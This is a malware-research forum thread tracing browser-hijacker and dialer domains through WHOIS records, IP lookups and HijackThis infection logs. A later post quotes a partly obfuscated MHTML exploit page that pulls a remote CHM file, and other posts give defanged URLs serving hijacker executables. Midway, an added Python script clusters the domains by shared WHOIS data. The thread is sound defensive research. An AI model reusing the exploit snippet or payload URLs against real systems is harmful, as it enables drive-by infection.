Full Version: - BROWSER / INTERNET HIJACKERS -
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
doggfather
your-web-search.com
IP Addresses: 205.209.134.221
IP Country: UNITED STATES
Reverse IP Lookup: IP hosts 12 domains

Hosting Company Name:
ICANN Registrar: DIRECT INFORMATION PVT. LTD., DBA DIRECTI.COM
Creation Date: Oct 19 2004
Expiry Date: Oct 19 2007

Web Server: N/A
Website Status:

Registration Service Provided By: ESTDOMAINS
Contact:
Website: http://www.estdomains.com
Abuse Desk Email Address:

Domain Name: YOUR-WEB-SEARCH.COM

Registrant:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266

Creation Date: 19-Oct-2004
Expiration Date: 19-Oct-2007

Domain servers in listed order:
ns.hostpoints.net
nss.hostpoints.net


Administrative Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266

Technical Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266

Billing Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266

Status:ACTIVE

205.209.134.221 - IP hosts 12 Total Domains ...
Showing 1 - 12 out of 12

Domain Name
1 ANDYS-COLLECTION.COM.
2 COOL-TGP.COM.
3 DIRTY-GAMES.NET.
4 DRUGSCATALOGUE.COM.
5 boring-ARTS-SHOP.COM.
6 PHOTOBYAG.COM.
7 PORTRAIT-FROM-PHOTO.COM.
8 PRIVATEPASSION.NET.
9 REAL-AMATEURS-FOR-FREE.COM.
10 SEXYRUSSIANGIRLS.NET.
11 TOP-AMATEUR-LINKS.NET.
12 YOUR-WEB-SEARCH.COM.
doggfather
makemesearch.com

IP Addresses: 195.225.177.9
IP Country: UKRAINE
Reverse IP Lookup: IP hosts 5 domains

Hosting Company Name:
ICANN Registrar: DIRECT INFORMATION PVT. LTD., DBA DIRECTI.COM
Creation Date: Aug 6 2004
Expiry Date: Aug 6 2005

Web Server: N/A
Website Status:

Registration Service Provided By: ESTDOMAINS
Contact:
Website: http://www.estdomains.com
Abuse Desk Email Address:

Domain Name: MAKEMESEARCH.COM

Registrant:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111

Creation Date: 06-Aug-2004
Expiration Date: 06-Aug-2005

Domain servers in listed order:
ns1.makemesearch.com
ns2.makemesearch.com


Administrative Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111

Technical Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111

Billing Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111

Status:ACTIVE

195.225.177.9 - IP hosts 5 Total Domains ...
Showing 1 - 5 out of 5

Domain Name
1 MAKEMESEARCH.COM.
2 MAKEUSSEARCH.COM.
3 TOOLBARPLACE.COM.
4 TOPSITEHQ.COM.
5 YOPSEARCH.COM.
Moore
356563.NET


356563.NET:209.66.121.9-209.66.121.9

Server Type: Apache/1.3.31 (Unix) PHP/4.3.8
IP Address: 209.66.121.9
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications

Name Server: NS1.008I.COM NS2.008I.COM

Registration Service Provided By: ESTDOMAINS

Domain Name: 356563.NET

Registrant:
None
Pavel Petroff
PO BOX 2176
c/o Pint spb N20
Slough PDO
,SL3 0PE
GB
Tel. +7.5017000206

Creation Date: 22-Jan-2004
Expiration Date: 22-Jan-2006

Domain servers in listed order:
ns1.008i.com
ns2.008i.com
Moore
AWMDIALER.COM

AWMDIALER.COM:209.66.121.17-209.66.121.17

http://www.whois.sc/awmdialer.com

Server Type: Apache/1.3.28 (Unix) PHP/5.0.1
IP Address: 209.66.121.17
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications

APS COMMUNICATIONS:209.66.121.0-209.66.121.255

Name Server: NS1.CMKHOST.COM NS2.CMKHOST.COM
ICANN Registrar: BULKREGISTER, LLC.
Created: 11-aug-2003
Expires: 11-aug-2005
Status: ACTIVE

AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE

Domain Name: AWMDIALER.COM

Administrative Contact:
Claus Rogge
AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE
Phone: email only

Record updated on 2004-07-05 05:41:50
Record created on 2003-08-11
Record expires on 2005-08-11

Domain servers in listed order:

NS1.CMKHOST.COM 209.66.121.15
NS2.CMKHOST.COM 209.66.121.25

TransferGuard LOCK Status => ENABLED
Moore
http://www.webhelper4u.com/CWS/CWSdropper_exe.html

========================================

hxxp://www.hotoffers.info
69.50.173.3
www.hotoffers.info

http://www.whois.sc/69.50.173.3

www.Allaboutvirgins.com
www.Allxxxteen.com
www.Enlargeyourpockets.com
www.Freeandexclusive.com
www.Fullhqgalleries.com
www.Hotoffers.info
www.Lust-mature.com
www.Teens-dreams.net
www.Wearehosters.com

---------------------

hxxp://antispy.globolook.com
69.50.173.4
antispy.globolook.com

www.Globolook.com
www.Pshik.com

http://www.whois.sc/69.50.173.4

69.50.173.0 - 69.50.173.31
Mohamed Ayyad

Registrant:
Geo
123 Street
Moscow
RU,121443
RU
Tel. +7.4158875

Creation Date: 10-Nov-2004
Expiration Date: 10-Nov-2005

Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com

Domain Name: PSHIK.COM

Registrant:
1
bagzic ()
Pervomaiskaya
Moscow
null,120097
RU
Tel. +8.901454567

Creation Date: 14-Jun-2004
Expiration Date: 14-Jun-2005

Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com


------------------------

39.dapfeed.com/X.exe (IP: 65.75.191.240)

www.Dapfeed.com


65.75.191.240
39.dapfeed.com
65.75.128.0 - 65.75.191.255
Managed Solutions Group, Inc

Domain Name: DAPFEED.COM

Registrant:
Foton
Johan ()
Albrechtstrasse, 26
Berlin
null,10117
DE
Tel. +030.288870
Fax. +030.28887163

Creation Date: 02-Feb-2005
Expiration Date: 02-Feb-2006

Domain servers in listed order:
24572.mercury.orderbox-dns.com
24572.venus.orderbox-dns.com


======================================


hxxp://82.179.166.69/
82.179.160.0 - 82.179.175.255
ICS TM, JSC
70 Bolshoy pr. V.O.
199002 St.-Petersburg
Russian Federation


=============================================

69.50.191.68
24-7-search.com
69.50.160.0 - 69.50.191.255
Atrivo

http://www.whois.sc/24-7-search.com

Domain Name: 24-7-SEARCH.COM

Registrant:
Pizdataya Compania Inc.
Vasiliy Pupklindtovich ()
Grlrznih Drovosekov 15
Urupinsk
null,195156
CC
Tel. +91.4896785423

Creation Date: 13-Nov-2004
Expiration Date: 13-Nov-2005

Domain servers in listed order:
ns1.xpehbam.biz
ns2.xpehbam.biz


OrgName: Atrivo
OrgID: ATRIV
Address: 200 Paul Avenue
City: San Francisco
StateProv: CA
PostalCode: 94124
Country: US

NetRange: 69.50.160.0 - 69.50.191.255
CIDR: 69.50.160.0/19
NetName: ATRIVOTECHNOLOGIES
NetHandle: NET-69-50-160-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: MAIL.ATRIVO.COM
NameServer: PAVEL.ATRIVO.COM


==============================================================

t34rulit.com
IP Address: 69.31.85.148 (ARIN & RIPE IP search)
IP Location: - New York - New York - Pilosoft Inc

http://www.whois.sc/69.31.85.148
http://www.whois.sc/t34rulit.com

nLayer Communications, Inc. NLYR-ARIN-BLK2 (NET-69-31-0-0-1)
69.31.0.0 - 69.31.143.255
Pilosoft, Inc. NLYR-69-31-80-0-1 (NET-69-31-80-0-1)
69.31.80.0 - 69.31.87.255

Registrant:
none
na Prikope 16
Praha, PG 16300
CZ
723101427

Domain Name: T34RULIT.COM
Administrative Contact:
Magel, Irgi
na Prikope 16
Praha, PG 16300
CZ
723101427

Record expires on 11-12-2005
Record created on 11-12-2003

Domain servers in listed order:
NS0.DIRECTNIC.COM 204.251.10.100
NS1.DIRECTNIC.COM 206.251.177.2

===================================================
Moore
DEDIALER.COM / MHTMLRedir.Exploit

Dedialer.com:205.252.161.237-205.252.161.237
MHTMLRedir.Exploit:205.252.161.238-205.252.161.238

Hijacker exe filenames are chosen according to geographic location:

rdgAU1861.exe
rdgDE1393.exe
RDGPH1342.EXE
rdgUS1391.exe


hxxp:// 205.252.161.238 /iex/doit.cgi?s=1753350144&xdat=&url=hxxp://205.252.161.238:80/rdgAU1861.exe

REQUEST ARG REFERER hxxp://205.252.161.238/connect.cgi?id=xxxx

dedialer.com
205.252.161.237

MHTMLRedir.Exploit
205.252.161.238

www.Dedialer.com
http://www.whois.sc/dedialer.com

www.Highdialer.com
http://www.whois.sc/highdialer.com

205.252.0.0 - 205.252.255.255
Beyond The Network America, Inc

Domain Name: DEDIALER.COM
Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341

Creation Date: 11-May-2004
Expiration Date: 11-May-2005

Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com


Domain Name: HIGHDIALER.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660

Creation Date: 12-Feb-2005
Expiration Date: 12-Feb-2006

Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com

-----------------------------
Other Evidence:
-----------------------------

http://www.trojaner-board.de/showthread.php?t=8932

O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml : file : //C : NXSFT.MHT ! hxxp ://205.252.161.238:80/iex/ofile.exe?url= hxxp://205.252.161.238:80/rdgDE1393.exe

O16 - DPF: {11111111-1111-1111-1111-111111113457} - file://c:\ied_s7m.cab
O16 - DPF: {11111111-1111-1111-1111-511111113457} - file://c:\x.cab
O16 - DPF: {11111111-1111-1111-1111-511111113458} - file://c:\x.cab

O21 - SSODL: SystemCheck - {54645654-2225-4455-44A1-9F4543D34544} - C:\WINDOWS\System32\vbsys.dll

vbsys.dll

http://it.trendmicro-europe.com/consumer/s...me=HTML_ADERS.A

QUOTE
This malicious HTML is a dropper program that upon execution downloads the file RDGPH1342.EXE from the following website:

http://63.<BLOCKED>.178.91/1/
It creates the following Registry key:

HKEY_CLASSES_ROOT\CLSID\
{54645654-2225-4455-44A1-9F4543D34544}


QUOTE
File C:\hello.exe infected by "TrojanDownloader.Win32.Small.xa" Virus
File C:\ied_s7m.cab infected by "TrojanDownloader.Win32.Mediket.a" Virus.
File C:\Programme\AVPersonal\INFECTED\XWXLOAD.EXE.VIR infected by "TrojanDownloader.Win32.Small.fo" Virus.
File C:\WINDOWS\Downloaded Program Files\CONFLICT.1\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus.
File C:\WINDOWS\Downloaded Program Files\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus. .



###############################################

Part of a very large infected log here :
http://www.trojaner-board.de/showthread.php?t=9479

O16 - DPF: {3277B58E-B431-3A3A-2503-253F53BF53CD} - hxxp://205.252.161.238/1/rdgUS1391.exe


##################################################
Moore
check-wire.com:195.225.177.21-195.225.177.21

195.225.177.21
check-wire.com

195.225.176.0 - 195.225.179.255
NetcatHosting
Ukraine

http://www.whois.sc/check-wire.com

www.Check-wire.com
Domain Name: CHECK-WIRE.COM

Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107

Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------

Reverse IP: Web server hosts 14 websites

www.2awm.com
www.4count.com
www.Awmgate.com
www.Awmnet.com
www.Check-wire.com
www.Find-by-web.com
www.Getnewfriend.com
www.Japonka.com
www.Lab-wire.com
www.Nastygirlssearch.com
www.Online-more.com
www.Search4www.com
www.Tiptopsearch.com
www.Icountertop.com


-----------------------------------------

www.2awm.com
Domain Name: 2AWM.COM
Registrant:
Somjet, inc
Adam Oker
Jungmannova 31
Prague 1
null,11000
CZ
Tel. +42.022449435
Creation Date: 24-Oct-2003
Expiration Date: 24-Oct-2005

-----------------------------------------

www.4count.com
Website Title: DETECTIVE Searcher
Domain Name: 4COUNT.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534

Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005

Domain servers in listed order:
ns1.4count.com
ns2.4count.com

-----------------------------------------

www.Awmgate.com
Website Title: AWM Gate Inc. presents.
Domain Name: AWMGATE.COM
Registrant:
N/A
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107

Creation Date: 28-Jul-2004
Expiration Date: 28-Jul-2005

---------------------------------------------

www.Awmnet.com
Domain Name: AWMNET.COM

Registrant:
Michel Lemercier
15 rue aristide Briand
CENON
null,33150
FR
Tel. +33.557541216

Creation Date: 13-Oct-2004
Expiration Date: 13-Oct-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Find-by-web.com
Website Title: Find-by-Web.com
Domain Name: FIND-BY-WEB.COM

Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE GB
Tel. +0.1278751107

Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Getnewfriend.com
Domain Name: GETNEWFRIEND.COM

Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341

Creation Date: 03-Jan-2005
Expiration Date: 03-Jan-2007

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Japonka.com
Domain Name: JAPONKA.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660

Creation Date: 03-Nov-2004
Expiration Date: 03-Nov-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Lab-wire.com
Domain Name: LAB-WIRE.COM

Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107

Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Nastygirlssearch.com
Website Title: DETECTIVE Searcher
Domain Name: NASTYGIRLSSEARCH.COM

Registrant:
Solar
Andre
Rome
Rome
null,00187
IT
Tel. +39.0623784534

Creation Date: 07-Dec-2004
Expiration Date: 06-Dec-2005

Domain servers in listed order:
ns1.nastygirlssearch.com
ns2.nastygirlssearch.com

-----------------------------------------------

www.Online-more.com
Domain Name: ONLINE-MORE.COM

Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107

Creation Date: 11-Jun-2004
Expiration Date: 11-Jun-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Search4www.com
Website Title: Check-Wire.com
Domain Name: SEARCH4WWW.COM

Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107

Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005

Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com

-----------------------------------------------

www.Tiptopsearch.com
Domain Name: TIPTOPSEARCH.COM

Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534

Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005

Domain servers in listed order:
ns1.4count.com
ns2.4count.com

-----------------------------------------------

www.Icountertop.com
Website Title: DETECTIVE Searcher
Domain Name: ICOUNTERTOP.COM

Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534

Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005

Domain servers in listed order:
ns1.4count.com
ns2.4count.com

-----------------------------------------------
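The posts above tie these domains together by hand: the same registrant phone number on check-wire.com, awmgate.com, find-by-web.com, lab-wire.com, online-more.com and search4www.com; the online-more.com name servers shared with getnewfriend.com and japonka.com; the "olga icn" registrant shared between getnewfriend.com and dedialer.com; and so on. The script below is an added example (not code from the thread) that does the same pivoting mechanically with a union-find over shared attribute values. The records are abbreviated transcriptions of the WHOIS data quoted in the thread (name servers reduced to their parent zone); the grouping logic, the "strong" versus "weak" pivot split and the shared_pivots helper are mine.

```python
"""Infrastructure pivoting on shared WHOIS/DNS attributes (added example)."""
from collections import defaultdict


def rec(domain, registrant, phone, ns, ip=""):
    """One abbreviated record; ns is the parent zone of the name servers, "" where unknown."""
    return {"domain": domain, "registrant": registrant, "phone": phone, "ns": ns, "ip": ip}


# Transcribed from the WHOIS/reverse-IP data quoted in this thread.
RECORDS = [
    rec("check-wire.com", "Levi Phillips", "+0.1278751107", "online-more.com", "195.225.177.21"),
    rec("awmgate.com", "Levi Phillips", "+0.1278751107", "", "195.225.177.21"),
    rec("find-by-web.com", "Levi Phillips", "+0.1278751107", "online-more.com", "195.225.177.21"),
    rec("getnewfriend.com", "olga icn", "+23.222341", "online-more.com", "195.225.177.21"),
    rec("dedialer.com", "olga icn", "+23.222341", "advancedhosters.com", "205.252.161.237"),
    rec("highdialer.com", "HAYTER MERCHANTS INC.", "+420.775688660", "advancedhosters.com"),
    rec("japonka.com", "HAYTER MERCHANTS INC.", "+420.775688660", "online-more.com", "195.225.177.21"),
    rec("4count.com", "Solar / Andre", "+39.0623784534", "4count.com", "195.225.177.21"),
    rec("tiptopsearch.com", "Solar / Andre", "+39.0623784534", "4count.com", "195.225.177.21"),
    rec("nastygirlssearch.com", "Solar / Andre", "+39.0623784534", "nastygirlssearch.com", "195.225.177.21"),
    rec("your-web-search.com", "Andrew Gurin", "+380.572287266", "hostpoints.net", "205.209.134.221"),
    rec("makemesearch.com", "Alex", "+78.456789456111", "makemesearch.com", "195.225.177.9"),
]

# Values the registrant controls are strong evidence of common ownership.
# A shared hosting IP also groups unrelated tenants of the same box, so it is weaker.
STRONG = ("phone", "ns")
WEAK = STRONG + ("ip",)


class DisjointSet:
    """Minimal union-find keyed by domain name."""

    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster(records, pivots):
    """Group domains transitively linked by any shared value of the given pivot fields."""
    ds = DisjointSet(r["domain"] for r in records)
    by_value = defaultdict(list)
    for r in records:
        for field in pivots:
            if r[field]:                                   # skip unknown/empty values
                by_value[(field, r[field])].append(r["domain"])
    for domains in by_value.values():
        for d in domains[1:]:
            ds.union(domains[0], d)
    groups = defaultdict(list)
    for r in records:
        groups[ds.find(r["domain"])].append(r["domain"])
    return sorted(sorted(g) for g in groups.values())


def shared_pivots(records, a, b, pivots=("registrant", "phone", "ns", "ip")):
    """Direct (one-hop) evidence tying two domains together: [(field, value), ...]."""
    ra = next(r for r in records if r["domain"] == a)
    rb = next(r for r in records if r["domain"] == b)
    return [(f, ra[f]) for f in pivots if ra[f] and ra[f] == rb[f]]


if __name__ == "__main__":
    for label, pivots in (("strong pivots only", STRONG), ("with hosting IP", WEAK)):
        print(label)
        for group in cluster(RECORDS, pivots):
            print("   " + ", ".join(group))
    print(shared_pivots(RECORDS, "dedialer.com", "getnewfriend.com"))
```

With phone and name servers only, the Levi Phillips / olga icn / HAYTER domains collapse into one group (dedialer.com joins it through the olga icn phone number and pulls highdialer.com in via advancedhosters.com), the three "Solar / Andre" domains form a second group, and your-web-search.com and makemesearch.com stay separate. Adding the hosting IP merges the first two groups because everything on 195.225.177.21 shares that one value; on a shared host that is exactly the kind of link that also sweeps in innocent tenants, so treat a lone shared IP as a lead, not a conclusion.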
Moore
-------------------------------------------------------

http://www.whois.sc/searchinweb.com
1 domains found on 69.50.190.253


CODE
69.50.190.253   www.searchinweb.com

http://toolbar.searchinweb.com/



QUOTE
Domain Name: SEARCHINWEB.COM

Registrant:
Web Search
Smith Johanes
1129 Delaware Avenue
Buffalo
NY,14209
US
Tel. +7.148841626

Creation Date: 12-May-2004
Expiration Date: 12-May-2005

Domain servers in listed order:
ns5.esthost.com
ns6.esthost.com


-----------------------------------------------------------

QUOTE
69.50.190.252  www.mybizarre.com     

www.Mybizarre.com
www.Tinyty.com
www.Zbdsm.com

Domain Name: MYBIZARRE.COM

Registrant:
    Web Search
    Smith Johanes
    1129 Delaware Avenue
    Buffalo
    NY,14209
    US
    Tel. +7.148841626

Creation Date: 31-May-2004
Expiration Date: 31-May-2005

Domain servers in listed order:
    ns5.esthost.com
    ns6.esthost.com



Mybizarre loads the following exploit pages from greg-tut/vparivalka.com...

There seems to be only one site registered to the IP address, and it's listed by Sophos as a trojan domain.

The hits in my firewall show it came from vparivalka.com/greg-tut...

The page that loaded the exploit, which my antivirus complained about as an MHTMLRedir.Exploit:

hxxp://vparivalka.com/G7/test.htm?id=11040&pop=

2:36:52 PM vparivalka.com 195.225.176.22
2:36:46 PM greg-tut.com 195.225.176.22

hxxp://vparivalka.com/G7/test.htm?id=11040&pop=
hxxp://greg-tut.com/G7/anticheatsys.php?id=11040


Also saw these Atrivo IPs :

hxxp://69.50.190.131/

Reverse IP: No websites hosted using this IP address
Reverse DNS: 69-50-190-131.esthost.com

hxxp://69.50.161.142/

www.Adult-catalog.net
www.Helpinweb.net
www.Pop-find.com
www.Refcount.com
www.Refcount.net
www.Waytofind.net
www.Webtopsearch.net

One of the exploit pages that was loaded:
hxxp://195.225.176.38/adverts/82/1.htm

http://www.whois.sc/loadcash.biz = 195.225.176.38

Broke up the code a bit to prevent antivirus warnings.

test[1].htm

CODE


HEAD  -  body onbeforeunload = 'window.open
(" test.ani.htm " , " popup " , " top=10000 , left=10000 , width=100 , height=100,scrollbars=0,menubar=0,toolbar=0,location=0,personalbar=0,status=0,re
sizable=0" ) ' >
-  script -  try   document. write  (' object data= "& #'+ 109 + ';    
s-its : mhtml '+' : '+' file : // C:  \\ foo.mht !  hxxp://vparivalka.com/G7/chm10.chm :: / launch10.html "
type= " text  /  x-scriptlet  "  object '); catch (e)
script


From a Google search, they are also using the domain name instead of the IP:

CODE
www.loadcash.biz/adverts/42/1.htm
www.Loadcash.biz



http://www.sophos.com/virusinfo/analyses/trojdloaderjw.html

Troj/Dloader-JW is a downloader Trojan.

Troj/Dloader-JW attempts to copy itself to the Windows system folder with the filename CMD32.EXE and to set the following entry in the registry so as to run itself on system startup, resetting this value periodically:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
ControlPanel
< Windows system folder >\cmd32.exe internat.dll,LoadKeyboardProfile

Troj/Dloader-JW attempts to download files from the following website to numbered files with DAT extensions or to the files CC.C or UU.U:

hxxp://www.loadcash.biz

Troj/Dloader-JW then copies the downloaded files to the Windows system folder with the following filenames and executes them:

izxxzdsafsafczxcr.exe
lpzxczxct.exe
izxczxcr.exe
intrcxzcxzcon.exe
intffdsronsad.exe
intfsdffdsronsad.exe

------------------------------------------

195.225.176.38

Blacklist Status: Listed
Cached Whois: Cached today
Whois History: 6 records stored
Record Type: IP Address
IP Location: United States - New York - New York - Netcathosting
Reverse IP: Web server hosts 1 websites

Reverse DNS: ip176-38.netcathost.com

inetnum: 195.225.176.0 - 195.225.179.255
netname: NETCATHOST
descr: NetcatHosting
country: UA
admin-c: VS1142-RIPE
tech-c: VS1142-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: NETCATHOST-MNT
mnt-routes: NETCATHOST-MNT

Domain Name: LOADCASH.BIZ
Domain ID: D9234139-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: ok
Registrant ID: OLNIC_781368_0_0
Registrant Name: Boris Fedorovich Semenov
Registrant Organization: Boris Fedorovich Semenov
Registrant Address1: Vasilia blajenovo - 56
Registrant City: Moscow
Registrant State/Province: MO
Registrant Postal Code: 567345
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.09565367656
Registrant Facsimile Number: +7.09565367656

########################################
Moore
QFIND.NET

www.qfind.net:69.50.161.123-69.50.161.123

69.50.160.0 - 69.50.191.255
Atrivo

3 domains found on 69.50.161.123

www.Catsearches.com
www.Personal404.com
www.Qfind.net


Domain Name: QFIND.NET

Registrant:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800

Creation Date: 24-Mar-2005
Expiration Date: 24-Mar-2006

Domain servers in listed order:
ns1.qfind.net
ns2.qfind.net

Administrative Contact:
KSH
Nill Peteresen
36 Senesten st.
Stockholm
null,38299
SE
Tel. +46.3940285800

Status:ACTIVE

Infection examples:

- http://forum.malwareremoval.com/viewtopic.php?t=1020 -

QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qfind.net/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://qfind.net/bar/index.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.qfind.net/search.php?qq=%s
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.qfind.net/search.php?qq=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page_bak = about:blank
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.qfind.net/http://www.qfind.net/
Moore
More atrivotech hijacker garbage

www.startsearches.net

www.startsearches.net:69.50.180.157-69.50.180.158

69.50.180.158
www.startsearches.net
69.50.160.0 - 69.50.191.255
Atrivo

69.50.180.157
ns2.startsearches.net

2 domains found on 69.50.180.158

www.Startsearches.net
www.Updatesearches.com

http://www.whois.sc/startsearches.net
http://www.whois.sc/updatesearches.com




Domain Name: STARTSEARCHES.NET

Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716

Creation Date: 05-May-2005
Expiration Date: 05-May-2006


Domain servers in listed order:
ns1.startsearches.net
ns2.startsearches.net

Infection Examples:

QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hzzp://www.startsearches.net/bar.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = hzzp://www.startsearches.net/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = hzzp://www.startsearches.net/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hzzp://www.startsearches.net/



Domain Name: UPDATESEARCHES.COM

Registrant:
Henn Preson
291 Senevens ave.
Stockholm
,49271
SE
Tel. +44.2958297292

Creation Date: 24-May-2005
Expiration Date: 24-May-2006


Domain servers in listed order:
ns1.updatesearches.com
ns2.updatesearches.com


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


QUICKNAVIGATE.COM

www.quicknavigate.com:69.50.180.154-69.50.180.155

69.50.180.154
www.quicknavigate.com
69.50.160.0 - 69.50.191.255
Atrivo

69.50.180.155
ns2.quicknavigate.com

http://www.whois.sc/quicknavigate.com

Domain Name: QUICKNAVIGATE.COM

Registrant:
Pertennen
Malcolm Deniakke
37 Seinaame st.
Helsinki
,4821
FI
Tel. +359.482082716

Creation Date: 05-May-2005
Expiration Date: 05-May-2006


Domain servers in listed order:
ns1.quicknavigate.com
ns2.quicknavigate.com


Infection Examples:

QUOTE
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.quicknavigate.com/bar.html
